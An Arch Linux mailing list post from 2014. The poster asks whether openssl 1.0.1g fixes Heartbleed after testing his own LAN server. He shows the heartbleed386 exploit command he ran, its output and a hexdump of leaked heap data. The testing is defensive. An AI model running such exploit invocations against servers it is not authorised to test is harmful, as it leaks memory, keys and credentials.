[arch-general] Does openssl 1.0.1.g-1 close the heartbleed exploit?

David C. Rankin drankinatty at suddenlinkmail.com
Fri Apr 25 03:41:07 EDT 2014 

Guys,

  I was testing my boxes after updating to openssl 1.0.1.g-1 with heartbleed.c
and I am still able to grab and decrypt ssl packets. The openssl security note
says 1.0.1.g is not effected by the bug, but I can still get a 64k chuck of data
back from my server using the heartbleed.c test. (if I'm reading the output
correctly) Am I may be doing something wrong? It is worth asking to be sure.

Archlinux server: phoinix - openssl 1.0.1.g-1

from client machine:

 $ ./heartbleed386 -s 192.168.7.16 -p 443 -f outph -t 1
[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit
[ =============================================================
[ connecting to 192.168.7.16 443/tcp
[ connected to 192.168.7.16 443/tcp
[ <3 <3 <3 heart bleed <3 <3 <3
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ heartbleed leaked length=65535
[ final record type=24, length=16384
[ wrote 16381 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'
[ heartbeat returned type=24 length=42
[ decrypting SSL packet
[ final record type=24, length=18
[ wrote 18 bytes of heap to file 'outph'
[ done.
 $ ls -al outph
-rwx------ 1 david david 65554 Apr 25 01:43 outph
 $ hexdump -C outph
00000000  52 74 59 da c6 d0 3a 5d  35 7e 33 fc 43 de e5 bb  |RtY...:]5~3.C...|
00000010  31 a2 ca c1 30 ff 5a e7  fd 28 52 4a 3c 18 51 4b  |1...0.Z..(RJ<.QK|
00000020  93 1e 2e 7b 41 58 e2 79  58 b8 26 f4 a0 d2 11 22  |...{AX.yX.&...."|
00000030  4d bc 62 54 7c 59 5c 63  11 42 fe 88 00 87 c0 32  |M.bT|Y\c.B.....2|
00000040  c0 2e c0 2a c0 26 c0 0f  c0 05 00 9d 00 3d 00 35  |...*.&.......=.5|
00000050  00 84 c0 12 c0 08 c0 1c  c0 1b 00 16 00 13 c0 0d  |................|
00000060  c0 03 00 0a c0 2f c0 2b  c0 27 c0 23 c0 13 c0 09  |...../.+.'.#....|
00000070  c0 1f c0 1e 00 a2 00 9e  00 67 00 40 00 33 00 32  |.........g. at .3.2|
00000080  00 9a 00 99 00 45 00 44  c0 31 c0 2d c0 29 c0 25  |.....E.D.1.-.).%|
00000090  c0 0e c0 04 00 9c 00 3c  00 2f 00 96 00 41 00 07  |.......<./...A..|
000000a0  c0 11 c0 07 c0 0c c0 02  00 05 00 04 00 15 00 12  |................|
000000b0  00 09 00 14 00 11 00 08  00 06 00 03 00 ff 02 01  |................|
000000c0  00 01 32 00 0b 00 04 03  00 01 02 00 0a 00 34 00  |..2...........4.|
000000d0  32 00 0e 00 0d 00 19 00  0b 00 0c 00 18 00 09 00  |2...............|
000000e0  0a 00 16 00 17 00 08 00  06 00 07 00 14 00 15 00  |................|
000000f0  04 00 05 00 12 00 13 00  01 00 02 00 03 00 0f 00  |................|
00000100  10 00 11 00 23 00 00 00  0d 00 20 00 1e 06 01 06  |....#..... .....|
00000110  02 06 03 05 01 05 02 05  03 04 01 04 02 04 03 03  |................|
00000120  01 03 02 03 03 02 01 02  02 02 03 00 0f 00 01 01  |................|
00000130  00 15 00 c1 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
000001f0  00 00 00 00 00 5c c0 5d  c0 5e c0 5f c0 60 c0 61  |.....\.].^._.`.a|
00000200  c0 62 c0 63 c0 64 c0 65  c0 66 c0 67 c0 68 c0 69  |.b.c.d.e.f.g.h.i|
00000210  c0 6a c0 6b c0 6c c0 6d  c0 6e c0 6f c0 70 c0 71  |.j.k.l.m.n.o.p.q|
00000220  c0 72 c0 73 c0 74 c0 75  c0 76 c0 77 c0 78 c0 79  |.r.s.t.u.v.w.x.y|
00000230  c0 7a c0 7b c0 7c c0 7d  c0 7e c0 7f c0 80 c0 81  |.z.{.|.}.~......|
<snip - a lot more, with CN and other cert into visible>

  Can anyone confirm the openssl 1.0.1.g-1 fix against their arch server? The
information I get back in response to heartbleed has been decrypted -- that
leads me to believe the current openssl 1.0.1.g-1 may be suspect as well. Or am
I looking at this wrong?

  The ./heartbleed output that concerns me is:

[ heartbleed leaked length=65535

  However, each of the subsequent calls by ./heartbleed returned only ~16408,
which if I understand correctly is the max that should be returned after the fix:

[ heartbeat returned type=24 length=16408
[ decrypting SSL packet
[ final record type=24, length=16384
[ wrote 16384 bytes of heap to file 'outph'

  Is this the expected fixed behavior, or does this still reflect a
vulnerability present? What say the experts? Thanks.

-- 
David C. Rankin, J.D.,P.E.

More information about the arch-general mailing list